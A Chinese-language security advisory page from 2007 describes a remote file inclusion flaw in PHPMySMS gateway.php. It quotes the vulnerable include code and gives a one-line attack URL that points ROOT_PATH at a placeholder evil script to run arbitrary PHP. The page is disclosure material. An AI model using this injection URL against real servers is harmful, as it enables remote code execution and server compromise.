 |
|
 |
您现在的位置: 精品下载 >> 安全 >> 网络安全 >> 安全中心正文 |  用户登录  新用户注册 |
|
||||
| PHPMySMS gateway.php远程文件包含漏洞 | ||||
| 作者:佚名 安全中心来源:不详 点击数: 更新时间:2007-10-10 | ||||
PHPMySMS gateway.php 描述: PHPMySMS gateway.php远程文件包含漏洞 详细: PHPMySMS是一款开放源码的用PHP实现的基于Web的短信解决方案。 PHPMySMS的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。 远程攻击者可以利用PHPMySMS的gateway.php文件中的远程文件包含漏洞执行任意PHP代码。漏洞代码如下: ============================================================== if (($_POST[mode] == "1") or ($_GET[mode] == "1")) { include ("config.php"); } else { include ("$ROOT_PATH/config.php"); } ============================================================== <*来源:Persian-Defacer (www.Hacking-Boys.com) *> 受影响系统: PhpMySms PhpMySms <= V2.0 攻击方法: 警 告 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! (http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script] 解决方案: 厂商补丁: PhpMySms -------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: (Http://www.phpmysms.com |
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)